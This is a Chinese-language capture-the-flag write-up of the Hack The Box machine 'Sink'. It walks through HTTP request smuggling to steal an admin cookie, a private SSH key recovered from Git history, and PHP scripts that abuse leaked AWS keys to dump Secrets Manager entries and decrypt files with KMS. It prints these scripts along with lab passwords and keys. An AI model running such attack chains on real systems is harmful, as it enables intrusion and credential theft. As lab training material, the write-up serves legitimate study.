基本信息

端口扫描

22,3000,5000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
$ nmap -sC -sV 10.10.10.225
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 12:41 CST
Nmap scan report for 10.10.10.225
Host is up (0.067s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=714cddd71aee2a02; Path=/; HttpOnly
|     Set-Cookie: _csrf=_ycfY9hBp5PAKQ-XJR1ggnsCr0o6MTYxMjI0MDg5ODI3MzYyNDA0NA; Path=/; Expires=Wed, 03 Feb 2021 04:41:38 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 02 Feb 2021 04:41:38 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions:
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=07991f7d68fd14ab; Path=/; HttpOnly
|     Set-Cookie: _csrf=xAWo2w_3nXPBKyseOI9cHESeZ3s6MTYxMjI0MDkwMzY0ODE1MzgyMg; Path=/; Expires=Wed, 03 Feb 2021 04:41:43 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 02 Feb 2021 04:41:43 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
5000/tcp open  http    Gunicorn 20.0.0
|_http-title: Sink Devops
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.91%I=7%D=2/2%Time=6018D801%P=x86_64-apple-darwin19.6.0
SF:%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(GetRequest,2943,"HTTP/1\.0\x20200\x20OK\r\nContent-T
SF:ype:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Pa
SF:th=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=714cddd71aee
SF:2a02;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=_ycfY9hBp5PAKQ-XJR
SF:1ggnsCr0o6MTYxMjI0MDg5ODI3MzYyNDA0NA;\x20Path=/;\x20Expires=Wed,\x2003\
SF:x20Feb\x202021\x2004:41:38\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20S
SF:AMEORIGIN\r\nDate:\x20Tue,\x2002\x20Feb\x202021\x2004:41:38\x20GMT\r\n\
SF:r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\n<h
SF:ead\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20nam
SF:e=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n
SF:\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<t
SF:itle>\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title>\n\t
SF:<link\x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crossorigin=\"
SF:use-credentials\">\n\t<meta\x20name=\"theme-color\"\x20content=\"#6cc64
SF:4\">\n\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\x20Git\x20with
SF:\x20a\x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"description\"\x20c
SF:ontent=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x
SF:20painless")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(HTTPOptions,206D,"HTTP/1\.0\x20404\x20Not\x20Fou
SF:nd\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20la
SF:ng=en-US;\x20Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_git
SF:ea=07991f7d68fd14ab;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=xAW
SF:o2w_3nXPBKyseOI9cHESeZ3s6MTYxMjI0MDkwMzY0ODE1MzgyMg;\x20Path=/;\x20Expi
SF:res=Wed,\x2003\x20Feb\x202021\x2004:41:43\x20GMT;\x20HttpOnly\r\nX-Fram
SF:e-Options:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2002\x20Feb\x202021\x2004:41
SF::43\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=
SF:\"theme-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\
SF:n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initi
SF:al-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"i
SF:e=edge\">\n\t<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20w
SF:ith\x20a\x20cup\x20of\x20tea\x20</title>\n\t<link\x20rel=\"manifest\"\x
SF:20href=\"/manifest\.json\"\x20crossorigin=\"use-credentials\">\n\t<meta
SF:\x20name=\"theme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=\"aut
SF:hor\"\x20content=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\"
SF:\x20/>\n\t<meta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20
SF:with\x20a\x20c");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.75 seconds

3000

3000是gitea:

5000

5000是devops:

devops

5000端口随意注册登录,查看请求响应发现haproxy和gunicorn:

这个搭配搜索资料发现请求走私漏洞:

请求走私

随意注册登录进去后提交评论,进行请求走私,然后会触发管理员的request,之后去home查看,管理员的request header会作为评论显示在那里:

1
GET /notes/delete/1234 HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Encoding: gzip, deflate Accept: */* Cookie: session=eyJlbWFpbCI6ImFkbWluQHNpbmsuaHRiIn0.YBjPNQ.saU-Xnc0tQ9KkDKoBF8EBw0zbMY X-Forwarded-For: 127.0.0.1

admin

替换cookie,现在我们是管理员:

notes

admin三个notes就是三个不同系统的账号密码:

1
2
3
4
5
Chef Login : http://chef.sink.htb Username : chefadm Password : /6'fEGC&zEx{4]zz

Dev Node URL : http://code.sink.htb Username : root Password : FaH@3L>Z3})zzfQ3

Nagios URL : https://nagios.sink.htb Username : nagios_adm Password : g8<H6GK\{*L.fB3C

gitea

使用code那个用户名密码可以登录3000的gitea:

1
root : FaH@3L>Z3})zzfQ3

Key_Management

在Key_Management的commits里可以找到marcus用户的私钥:

marcus_id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

user flag

然后直接用这个私钥ssh登录marcus用户,得到user.txt:

AWS

根据Key_Management相关代码,主要就是aws操作,可以直接在已有代码的基础上进行操作, 下载代码,根据代码信息需要把4566端口转发出来,key和secret可以在Log_Management中找到:

1
2
3
4
5
6
ssh -N -L 4566:127.0.0.1:4566 -i marcus_id_rsa marcus@10.10.10.225

'credentials' => [
		'key' => 'AKIAIUEN3QWCPSTEITJQ',
		'secret' => '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'
	],

list secrets

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
        'region' => 'eu',
        'endpoint' => 'http://127.0.0.1:4566',
        'credentials' => [
                'key' => 'AKIAIUEN3QWCPSTEITJQ',
                'secret' => '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'
        ],
        'version' => 'latest'
]);
try {
$result = $client->listSecrets(array(
));
var_dump($result);
}
catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

get secret values

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
        'region' => 'eu',
        'endpoint' => 'http://127.0.0.1:4566',
        'credentials' => [
                'key' => 'AKIAIUEN3QWCPSTEITJQ',
                'secret' => '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'
        ],
        'version' => 'latest'
]);

$secretIDs = ["arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-zwTEL",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-yLXAA",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-nAWmk"];

try {
for ($i=0; $i<count($secretIDs); $i++) {
    $result = $client->getSecretValue(array(
        'SecretId' => $secretIDs[$i],
    ));
    var_dump($result);
}
}
catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
1
2
3
{"username":"john@sink.htb","password":"R);\)ShS99mZ~8j"}
{"username":"albert@sink.htb","password":"Welcome123!"}
{"username":"david@sink.htb","password":"EALB=bcC=`a7f2#k"}

david

通过aws相关操作得到david密码,切换到david:

servers.enc

发现一个加密的servers.enc文件,解密还是需要通过aws操作:

listkeys

项目里自带listkeys,直接运行报错,需要把里面的version改成latest,还有认证信息参考前面的脚本改:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
require 'vendor/autoload.php';

use Aws\Kms\KmsClient;
use Aws\Exception\AwsException;

$KmsClient = new Aws\Kms\KmsClient([
    'version' => 'latest',
    'region' => 'eu',
    'credentials' => [
        'key' => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'endpoint' => 'http://127.0.0.1:4566'
]);

$limit = 100;

try {
    $result = $KmsClient->listKeys([
        'Limit' => $limit,
    ]);
    var_dump($result);
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

decrypt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
require 'vendor/autoload.php';

use Aws\Kms\KmsClient;
use Aws\Exception\AwsException;

$KmsClient = new Aws\Kms\KmsClient([
    'version' => 'latest',
    'region' => 'eu',
    'credentials' => [
        'key' => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'endpoint' => 'http://127.0.0.1:4566'
]);

$keys = ["0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
    "16754494-4333-4f77-ad4c-d0b73d799939",
    "2378914f-ea22-47af-8b0c-8252ef09cd5f",
    "2bf9c582-eed7-482f-bfb6-2e4e7eb88b78",
    "53bb45ef-bf96-47b2-a423-74d9b89a297a",
    "804125db-bdf1-465a-a058-07fc87c0fad0",
    "837a2f6e-e64c-45bc-a7aa-efa56a550401",
    "881df7e3-fb6f-4c7b-9195-7f210e79e525",
    "c5217c17-5675-42f7-a6ec-b5aa9b9dbbde",
    "f0579746-10c3-4fd1-b2ab-f312a5a0f3fc",
    "f2358fef-e813-4c59-87c8-70e50f6d4f70"];
$cipherb64 = "mXMs+8ZLEp9krGLLJT2YHLgHQP/uRJYSfX+YTqar7wabvOQ8PSuPwUFAmEJh86q3kaURmnRxr/smZvkU6Pp0KPV7ye2sP10hvPJDF2mkNcIEVif3RaMU08jZi7U/ghZyoXseM6EEcu9c1gYpDqZ74CMEh7AoasksLswCJJZYI0TfcvTlXx84XBfCWsK7cTyDb4SughAq9MY89Q6lt7gnw6IwG/tSHi9a1MY8eblCwCMNwRrFQ44x8p3hS2FLxZe2iKUrpiyUDmdThpFJPcM3uxiXU+cuyZJgxzQ2Wl0Gqaj0RpVD2w2wJGrQBnCnouahOD1SXT3DwrUMWXyeNMc52lWo3aB+mq/uhLxcTeGSImHJcfUYYQqXoIrOHcS7O1WFoaMvMtIAl+uRslGVSEwiU6sVe9nMCuyvrsbsQ0N46jjro5h1nFmTmZ0C1Xr97Go/pHmJxgG1lxnOepsglLrPMXc5F6lFH1aKxlzFVAxGKWNAzTlzGC+HnBXjugLpP8Shpb24HPdnt/fF/dda8qyaMcYZCOmLODums2+ROtrPJ4CTuaiSbOWJuheQ6U/v5AbeQSF93RF28iyiA905SCNRi3ejGDH65OWv6aw1VnTf8TaREPH5ZNLazTW5Jo8kvLqJaEtZISRNUEmsJHr79U1VjpovPzePTKeDTR0qosW/GJ8=";

for ($i=0; $i<count($keys); $i++) {

try {
    $result = $KmsClient->enableKey([
        'KeyId' => $keys[$i],
    ]);

    $result = $KmsClient->decrypt([
        'CiphertextBlob' => base64_decode($cipherb64),
        'KeyId' => $keys[$i],
        'EncryptionAlgorithm' => 'RSAES_OAEP_SHA_256',
    ]);
    echo base64_encode($result["Plaintext"]);
}
catch (AwsException $e) {
}
}

servers.yml

解密得到的base64解码,gzip解压后是servers.yml,里面有密码:

1
2
name: admin
pass: _uezduQ!EY5AHfe2

root flag

这个密码就是root密码,直接ssh登录,得到root.txt:

参考资料